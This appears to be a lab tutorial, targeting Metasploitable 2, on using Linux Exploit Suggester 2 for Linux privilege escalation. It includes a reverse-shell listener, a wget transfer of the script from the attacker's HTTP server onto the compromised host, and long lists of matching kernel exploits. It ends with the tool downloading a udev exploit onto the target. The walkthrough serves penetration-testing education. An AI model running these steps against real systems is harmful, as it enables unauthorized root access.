Privilege escalation is one of the essential skills a hacker can have and often separates the newbies from the pros. With a continually changing landscape and a plethora of exploits out there, it can be a problematic aspect of any attack. Luckily, some tools can help expedite the process. Linux Exploit Suggester is just one of many to help you get root.
Privilege escalation is the act of gaining access to the privileges of another user on the system. It comes in two flavors: horizontal and vertical privilege escalation.
Horizontal privilege escalation is when an attacker gains access to another user account, typically with the same status and permissions. It can allow them access to additional systems or data but isn't quite as serious as its vertical cousin. Vertical privilege escalation is when an attacker obtains access to an account with elevated privileges, such as that of a system administrator.
Privilege escalation, especially the vertical kind, is vital for the attacker because it allows them to do things an average user wouldn't be able to. Unless the system is poorly configured, standard users can't usually execute malicious code or configure the system in dramatic ways that would benefit an attacker. That is why privilege escalation is vital for the complete compromise of a target.
Step 1: The Setup & Initial Compromise
To get started, we're using Metasploitable 2 as the target and Kali Linux as our local machine. You can use a similar setup. When ready, we need to download Linux Exploit Suggester from GitHub.
Let's assume that the target has restricted access to the internet, so we'll need to have it on our local machine first and transfer it over to the target later. We can use wget to download the script directly from the terminal:
~# wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
--2020-02-18 12:15:58-- https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24780 (24K) [text/plain]
Saving to: ‘linux-exploit-suggester-2.pl’
linux-exploit-suggester-2.pl 100%[======================================================================================================================>] 24.20K --.-KB/s in 0.03s
2020-02-18 12:15:58 (718 KB/s) - ‘linux-exploit-suggester-2.pl’ saved [24780/24780]
Now we'll need to compromise the target and get shell access. Command injection is always a fun option. Then, once we catch the incoming connection, we can verify that we are the www-data user with the id command:
~# nc -lvnp 4321
listening on [any] 4321 ...
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 36302
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
From here, we will want to upgrade to a fully interactive TTY shell so we have more control and can use tab completion, command history, etc. Once we have upgraded our shell, we can navigate to a world-writable directory so we can receive and eventually run the tool:
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /dev/shm
Step 2: Transfer the Script to the Target
Back on our local machine, let's rename the script to something shorter:
~# mv linux-exploit-suggester-2.pl les2.pl
Now we can serve the script with Python's SimpleHTTPServer module — use the -m switch to specify the module:
~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
That will serve any content in the directory over HTTP on port 8000.
Back on the target, we can use wget again to retrieve the script from our local machine:
www-data@metasploitable:/dev/shm$ wget http://10.10.0.1:8000/les2.pl
--13:43:17-- http://10.10.0.1:8000/les2.pl
=> `les2.pl'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24,780 (24K) [text/x-perl]
100%[=========================================================================================================================================================================>] 24,780 --.--K/s
13:43:18 (70.47 MB/s) - `les2.pl' saved [24780/24780]
Once that completes, we can kill the Python server. Now we can take a look at the current permissions of our script that we just transferred over:
www-data@metasploitable:/dev/shm$ ls -la
total 28
drwxrwxrwt 2 root root 60 Jun 19 13:43 .
drwxr-xr-x 13 root root 13480 Jun 19 13:28 ..
-rw-r--r-- 1 www-data www-data 24780 Feb 18 2020 les2.pl
We can see that it isn't executable at this point (-rw-r--r--), so use the chmod command to make it executable:
www-data@metasploitable:/dev/shm$ chmod +x les2.pl
Finally, we're all set to run the script.
Step 3: Run Linux Exploit Suggester
Since we made it executable, we can use the dot-slash to run Linux Exploit Suggester. Use the -h flag to see the help menu and usage example:
www-data@metasploitable:/dev/shm$ ./les2.pl -h
#############################
Linux Exploit Suggester 2
#############################
Usage: ./les2.pl [-h] [-k kernel] [-d]
[-h] Help (this message)
[-k] Kernel number (eg. 2.6.28)
[-d] Open exploit download menu
You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.
The most basic way to use the tool is running it without any options:
www-data@metasploitable:/dev/shm$ ./les2.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6.24
Searching 72 exploits...
Possible Exploits
[1] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[4] do_pages_move
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[5] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[6] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[7] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[8] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[9] msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[10] pipe.c_32bit
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[11] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[12] reiserfs
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[13] sock_sendpage
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[14] sock_sendpage2
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[15] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[16] vmsplice1
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[17] vmsplice2
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093
Linux Exploit Suggester works by grabbing the kernel version and comparing it to a list of possible exploits. Above, we can see it returned a handful of potential exploits, listing the respective name, CVE number, and link to the source.
We can also use the -k switch to specify the kernel version manually. Let's confirm the kernel number with the uname -r command:
www-data@metasploitable:/dev/shm$ uname -r
2.6.24-16-server
Instead of using the exact version number, we can truncate it to 2.6 since systems can often be vulnerable to slightly older exploits as well:
www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6
Searching 72 exploits...
Possible Exploits
[1] american-sign-language (2.6.0)
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] caps_to_root (2.6.34)
CVE-n/a
Source: http://www.exploit-db.com/exploits/15916
[4] dirty_cow (2.6.22)
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[5] do_pages_move (2.6.18)
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[6] elfcd (2.6.12)
[7] exit_notify (2.6.25)
Source: http://www.exploit-db.com/exploits/8369
[8] exp.sh (2.6.9)
[9] exploit_x (2.6.22)
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[10] ftrex (2.6.11)
CVE-2008-4210
Source: http://www.exploit-db.com/exploits/6851
[11] h00lyshit (2.6.8)
CVE-2006-3626
Source: http://www.exploit-db.com/exploits/2013
[12] half_nelson1 (2.6.0)
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[13] half_nelson2 (2.6.0)
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[14] half_nelson3 (2.6.0)
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[15] kdump (2.6.13)
[16] krad (2.6.5)
[17] krad3 (2.6.5)
Source: http://exploit-db.com/exploits/1397
[18] local26 (2.6.13)
[19] memodipper (2.6.39)
CVE-2012-0056
Source: http://www.exploit-db.com/exploits/18411
[20] msr (2.6.18)
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[21] newsmp (2.6)
[22] ong_bak (2.6.5)
[23] pipe.c_32bit (2.6.15)
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[24] pktcdvd (2.6.0)
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[25] prctl (2.6.13)
Source: http://www.exploit-db.com/exploits/2004
[26] prctl2 (2.6.13)
Source: http://www.exploit-db.com/exploits/2005
[27] prctl3 (2.6.13)
Source: http://www.exploit-db.com/exploits/2006
[28] prctl4 (2.6.13)
Source: http://www.exploit-db.com/exploits/2011
[29] ptrace_kmod2 (2.6.26)
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[30] pwned (2.6.11)
[31] py2 (2.6.9)
[32] raptor_prctl (2.6.13)
CVE-2006-2451
Source: http://www.exploit-db.com/exploits/2031
[33] rawmodePTY (2.6.31)
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[34] rds (2.6.30)
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
[35] reiserfs (2.6.18)
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[36] sctp (2.6.26)
CVE-2008-4113
[37] semtex (2.6.37)
CVE-2013-2094
Source: http://www.exploit-db.com/exploits/25444
[38] sock_sendpage (2.6.0)
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[39] sock_sendpage2 (2.6.0)
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[40] stackgrow2 (2.6.10)
[41] udev (2.6.25)
Alt: udev <1.4.1 CVE-2009-1185
Source: http://www.exploit-db.com/exploits/8478
[42] udp_sendmsg_32bit (2.6.1)
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[43] uselib24 (2.6.10)
[44] vconsole (2.6)
CVE-2009-1046
[45] video4linux (2.6.0)
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[46] vmsplice1 (2.6.17)
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093
We can see that it gave us a much larger pool of possible exploits.
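To make the version comparison described above concrete, here is a small Python reconstruction of the matching step, added as an example and not code from the Linux Exploit Suggester project. It parses a uname -r string, then matches a full or partial kernel version against a constructed table; the names, CVE ids and first affected versions come from the output above, while the upper ends of the ranges and the prefix-matching rule are assumptions inferred from that output.

```python
import re


def vuln_range(first, last):
    """Expand '2.6.17'..'2.6.24' into every patch version in between."""
    base, lo = first.rsplit(".", 1)
    _, hi = last.rsplit(".", 1)
    return [f"{base}.{n}" for n in range(int(lo), int(hi) + 1)]


# Constructed sample table, not the tool's own list: names, CVE ids and the
# first affected version are those the tool printed above; the upper ends of
# the ranges are assumptions made for this example only.
EXPLOIT_TABLE = [
    {"name": "vmsplice1", "cve": "CVE-2008-0600", "vuln": vuln_range("2.6.17", "2.6.24")},
    {"name": "dirty_cow", "cve": "CVE-2016-5195", "vuln": vuln_range("2.6.22", "2.6.39")},
    {"name": "udev", "cve": "CVE-2009-1185", "vuln": vuln_range("2.6.25", "2.6.29")},
    {"name": "memodipper", "cve": "CVE-2012-0056", "vuln": vuln_range("2.6.39", "2.6.39")},
]


def normalize_kernel(uname_r):
    """Reduce 'uname -r' output such as '2.6.24-16-server' to '2.6.24'."""
    m = re.match(r"\d+(?:\.\d+)*", uname_r.strip())
    if not m:
        raise ValueError(f"unrecognised kernel string: {uname_r!r}")
    return m.group(0)


def suggest(kernel, table=EXPLOIT_TABLE):
    """Return entries whose vulnerable-version list matches `kernel`.
    A full version ('2.6.24') must appear exactly; a partial one ('2.6')
    matches any version with that prefix, hence the larger pool above.
    The first matching version is kept, like the '(2.6.22)' suffix in the
    tool's -k output (assumed behaviour, inferred from the listing)."""
    partial = kernel.count(".") < 2
    hits = []
    for entry in table:
        for v in entry["vuln"]:
            if v == kernel or (partial and v.startswith(kernel + ".")):
                hits.append({"name": entry["name"], "cve": entry["cve"], "matched": v})
                break
    return hits


if __name__ == "__main__":
    local = normalize_kernel("2.6.24-16-server")  # the uname -r value above
    for k in (local, "2.6"):
        print(k, [f"{h['name']} ({h['matched']}) {h['cve']}" for h in suggest(k)])
```

The same comparison is what a patch-inventory check runs against a fleet's kernel versions: a full version tells you what is exposed now, a partial one shows everything in the series that was ever affected.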
The last option Linux Exploit Suggester provides is the ability to automatically download exploit scripts for any matches it finds. Use the -d flag to enable the option:
www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6 -d
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6
Searching 72 exploits...
Possible Exploits
[1] american-sign-language (2.6.0)
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] caps_to_root (2.6.34)
CVE-n/a
Source: http://www.exploit-db.com/exploits/15916
[4] dirty_cow (2.6.22)
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[5] do_pages_move (2.6.18)
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[6] elfcd (2.6.12)
[7] exit_notify (2.6.25)
Source: http://www.exploit-db.com/exploits/8369
[8] exp.sh (2.6.9)
[9] exploit_x (2.6.22)
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[10] ftrex (2.6.11)
CVE-2008-4210
Source: http://www.exploit-db.com/exploits/6851
[11] h00lyshit (2.6.8)
CVE-2006-3626
Source: http://www.exploit-db.com/exploits/2013
[12] half_nelson1 (2.6.0)
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[13] half_nelson2 (2.6.0)
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[14] half_nelson3 (2.6.0)
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[15] kdump (2.6.13)
[16] krad (2.6.5)
[17] krad3 (2.6.5)
Source: http://exploit-db.com/exploits/1397
[18] local26 (2.6.13)
[19] memodipper (2.6.39)
CVE-2012-0056
Source: http://www.exploit-db.com/exploits/18411
[20] msr (2.6.18)
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[21] newsmp (2.6)
[22] ong_bak (2.6.5)
[23] pipe.c_32bit (2.6.15)
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[24] pktcdvd (2.6.0)
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[25] prctl (2.6.13)
Source: http://www.exploit-db.com/exploits/2004
[26] prctl2 (2.6.13)
Source: http://www.exploit-db.com/exploits/2005
[27] prctl3 (2.6.13)
Source: http://www.exploit-db.com/exploits/2006
[28] prctl4 (2.6.13)
Source: http://www.exploit-db.com/exploits/2011
[29] ptrace_kmod2 (2.6.26)
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[30] pwned (2.6.11)
[31] py2 (2.6.9)
[32] raptor_prctl (2.6.13)
CVE-2006-2451
Source: http://www.exploit-db.com/exploits/2031
[33] rawmodePTY (2.6.31)
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[34] rds (2.6.30)
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
[35] reiserfs (2.6.18)
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[36] sctp (2.6.26)
CVE-2008-4113
[37] semtex (2.6.37)
CVE-2013-2094
Source: http://www.exploit-db.com/exploits/25444
[38] sock_sendpage (2.6.0)
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[39] sock_sendpage2 (2.6.0)
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[40] stackgrow2 (2.6.10)
[41] udev (2.6.25)
Alt: udev <1.4.1 CVE-2009-1185
Source: http://www.exploit-db.com/exploits/8478
[42] udp_sendmsg_32bit (2.6.1)
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[43] uselib24 (2.6.10)
[44] vconsole (2.6)
CVE-2009-1046
[45] video4linux (2.6.0)
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[46] vmsplice1 (2.6.17)
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093
Exploit Download
(Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
Select exploits to download:
After it determines the potential exploits, we are presented with an option to download either all scripts or individual scripts. For example, if we wanted to download the udev exploit, we would simply input its respective number ID:
Exploit Download
(Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
Select exploits to download: 41
Downloading https://www.exploit-db.com/raw/8478 -> exploit_udev
Keep in mind, the feature requires an active internet connection, so if access is restricted in any way, it won't work. Still, Linux Exploit Suggester makes it extremely easy to get the exploit script right on the target. From this point, it's just a matter of escalating privileges to get root.
Wrapping Up
In this tutorial, we learned about privilege escalation and a tool called Linux Exploit Suggester. We began with an initial compromise and transferred the script to the target. We were then able to run it and cover a few of its usage options to discover possible exploits that could be used to get root. Privilege escalation is an integral part of any hacker's methodology, and Linux Exploit Suggester is just one tool to aid in that goal.
Cover image by Pedro Sandrini/Pexels